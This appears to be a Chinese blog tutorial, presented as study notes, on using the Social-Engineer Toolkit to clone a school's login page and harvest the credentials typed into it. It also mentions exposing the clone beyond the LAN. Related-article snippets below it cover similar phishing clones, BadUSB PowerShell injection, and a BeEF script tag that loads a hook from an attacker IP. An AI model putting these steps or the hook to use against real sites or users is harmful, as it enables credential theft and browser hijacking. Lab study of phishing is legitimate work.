setoolkit——克隆网站及利用

最新推荐文章于 2025-03-26 17:17:13 发布
最新推荐文章于 2025-03-26 17:17:13 发布
阅读量4.3k 收藏 19
点赞数
分类专栏: 网络安全 学习笔记 文章标签: setoolkit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45808483/article/details/122175112
版权

0. 切换root用户

我们先切换到root用户,再去启动工具。

密码为登录kali时所使用的密码

sudo -i

1. setoolkit 启动

 启动成功

2. 选择Social-Engineering Attacks

3. 选择Website Attack Vectors

 4. 选择Credential Harvester Attack Method

 5. 选择Site Cloner

 6. 输入要克隆的网址

我要克隆的是我们学校的校园网认证页面

 输入网址

7. 访问验证

查看kali的内网IP(我这里是192.168.96.132),服务放在了80端口

我们可以对比两个页面,只有URL不同

8. 尝试登录

123456/123456

 后台成功获取账号密码

 

192为本机的内网ip,所以只有我们本机才能访问的到

Vmware虚拟机设置主机端口映射,可以使得我们本机所在的局域网或者公网都访问的到

详细教程参考以下文章

Vmware虚拟机设置主机端口映射_Mrqiang9001-CSDN博客_虚拟机端口映射

学习记录,禁止非法利用!!!后果自负!!!

centos7下载setoolkit克隆网站(fishing网站
Bu2n的博客
04-10 1592
前言测试环境下载setoolkit克隆网站总结 前言 本文章只做技术探讨,任何人企图进行非法活动与本作者无关。 测试环境 一台公网centos7(自己买的服务器) 一台windows10(我的本机) 一个公网登录网页 python3.6 下载setoolkit 下载python3.6 yum -y install python3 下载git yum -y install git 下载setoolkit git clone https://github.com/trustedsec/social-.
社会工程学——setoolkit的简单使用克隆钓鱼网站
Lzcsfg的博客
04-11 1971
Social Engineer Toolkit(SET)是一个开源的社会工程学攻击工具包,旨在模拟和执行多种社会工程学攻击,例如钓鱼、恶意软件传播和其他形式的社会工程学攻击。需要注意的是该克隆默认设置只可获取到以username 和password为字段的表单的信息,各网站设计者用的不一样,需要进一步学习实现克隆获取。下一步需要在网站上输入你的攻击机ip,即kali的IP即可进入克隆的钓鱼网站,当别人输入账户密码或者注册时你的kali终端这就会获取到。
如何克隆网站
T_Tzz的博客
07-06 1万+
今天介绍两种工具,能够克隆整个网站。 1、wget 首先,这个软件如何在windows、Liunx中下载我就不介绍了。 -r, –recursive(递归) specify recursive download.(指定递归下载) -k, –convert-links(转换链接) make links in downloaded HTML point to local files.(将下载...
有哪些网站是可以克隆的?克隆时需要注意什么?
Kooboo_china的博客
03-26 1138
合法的网站克隆是技术学习的重要途径,建议优先选择...
快速克隆网站(Teleport Ultra)
iteye_14984的博客
09-30 2443
百度一下Teleport Ultra。下载破解版本的Teleport Ultra。 (软件网上有很多,找个破解版本的) 软件的安装也很简单,基本上都是下一步下一步。安装好以后打开软件。 选择文件-----新建项目向导 然后选择你要使用本软件的目的。这里我们是要克隆一个网站。所以我们选择第二项。(如果其他目的可以按照自己的目的选择相关选项。) 填写你要克隆网站的地址。链...
技术分享:Setoolkit克隆网站
liu914589417的博客
05-06 2530
技术分享:Setoolkit克隆网站 实验工具 1、 VMware虚拟机 2、 Kali 2021 系统虚拟机 3、Windows 10物理机 4、Setoolkit社会工程学工具集 1、在VMware中打开Kali 2021虚拟机,确保与物理机Windows 10是连通状态,测试一下。 2、确定能连通后,回到Kali 2021虚拟机,打开一个【终端】,输入命令【setoolkit】进入社会工程学工具集,准备克隆网站。 3、回车执行后,开始进行克隆网站的准备工作,在出现的这些选项中选择【1)Social
setoolkit克隆网站获取用户信息
paradise
02-26 245
setookie 1-2-3-2 输入信息 访问克隆网站 用户访问克隆网站 后台得到用户提交的数据
setoolkit克隆网站抓取账号密码
博客地址 www.sec0nd.top
09-06 2196
社会工程师工具包(The Social-Engineer Toolkit)是一个为社会工程设计的开源渗透测试框架。SET有许多自定义攻击向量,允许您快速地进行可信的攻击。SET是TrustedSec有限责任公司的产品,该公司是一家位于俄亥俄州克利夫兰的信息安全咨询公司。此工具包中除了setoolkit还有seautomate和seproxysetoolkit默认会安装在kali中,直接使用即可。
kali工具set中钓鱼邮件
最新发布
04-02
- 接下来可进一步细化配置,比如选择克隆现有网站作为钓鱼页面的内容源[^2]。 #### 设置发送钓鱼邮件 完成钓鱼页面搭建之后,需准备实际投递机制——即钓鱼邮件本身。此过程涉及以下几个方面: - 构建一封看似...
社会工程学工具
m0_71383067的博客
05-31 1038
文章目录前言一、社会工程学的概念二、Kali Linux 2 中的社会工程学工具包1.社会工程学(SET)启动的二种方法:(1)菜单:(2)命令行:2.社会工程学(SET)的主菜单:(1)Social-Engineering Attacks(社会工程学攻击)(2)Penetration Testing (Fast-Track)(渗透测试)(3)Third Party Modules(第三方模块)(4)Update the Social-Engineer Toolkit(升级软件)(5)Update SET
badusb详细制作教程(两种方式实现远控)
热门推荐
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
网站克隆大师,可以轻松克隆网站修改网站和发布网站
01-14
网站克隆器 2.0_简体中文官方安装版 可以轻松克隆网站修改网站和发布网站
网站克隆工具-仿站工具
12-22
网站克隆工具-仿站工具,解压后点击ultra.exe可直接使用
网站克隆工具
08-14
一款由 82hy.com 提供的完美的网站克隆工具
网站克隆 简单方便
09-10
非常好用,轻松一步搞定一个网站!快来试试吧!
网站克隆setoolkit社工软件
qq_41679358的博客
09-20 2516
本文转自行云博客https://www.xy586.top beef-xss 安装beef-xss:apt install beef-xss 安装完成之后运行beef-xss: 登录网址:http://192.168.232.138:3000/ui/authentication 将beef-xss生成的js代码,放入网站中 <script src="http://192.168.232.138:3000/hook.js"></script> 被攻击目标打开网页链接,则beef.
网站克隆
qq_45086218的博客
02-06 1297
setoolkit 使用setoolkit工具:setoolkit 选择1,社会工程学攻击 选择2,Web攻击向量 选择3,认证信息获取攻击方法 若选择1,SET将提供Web模板:google、twitter等 这里我们选择2,网站克隆 注:QQ、微博等对安全等级要求十分严格的Web站点无法克隆成功 输入攻击机IP,填写目标网站进行克隆监听 此时靶机访问攻击机克隆网站(攻击机IP),POST数据将提交到攻击机 声明 本文仅供网络安全爱好者学习探讨,请勿用于违法犯罪。 ...
网站可以如此复制?
jinjazz
02-27 1万+
论坛中碰到如此问题:我们做了一个网站,域名是www.3322173.com 没想到今天忽然发现了www.qiepeng.cn的内容和我们的是一模一样...内容也是同步更新,只是把内容中3322173.com替换成qiepeng.cn 我关闭我自己的IIS后,两个域名都不能访问了. 我郁闷啊,这是什么样的技术哦.怎么解决呢?这个事情肇事人很无耻,也很容易对付,只要把对方服务器ip屏蔽掉就ok了,
kali 通过setoolkit-网站克隆获得账户密码
qq_33391644的博客
12-22 2783
注意:请确保80端口未被别的进程占用,否则会失败 一、启动setoolkit: 命令:setoolkit 二、输入1(Social-Engineering Attacks(社会工程攻击)) 三、输入2(Website Attack Vectors(网站攻击载荷)) 四、输入3(Credential Harvester Attack Method(凭据收割机攻击方法)) 五、...
kali setoolkit克隆网站
05-24
Kali setoolkit是一个用于执行渗透测试的工具集,其中包括了一些用于克隆网站的工具。以下是使用setoolkit克隆网站的步骤: 1. 打开Kali Linux终端,输入以下命令以启动setoolkit: ``` setoolkit ``` 2. 在setoolkit菜单中,选择“Website Attack Vectors”选项。 3. 选择“Credential Harvester Attack Method”选项。 4. 选择“Web Templates”选项。 5. 选择要克隆网站模板。 6. 输入要克隆网站URL。 7. 设置IP地址和端口号。 8. 等待setoolkit完成克隆过程。 请注意,使用setoolkit克隆网站可能会涉及到非法活动,应该仅用于合法的渗透测试目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ErYao7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值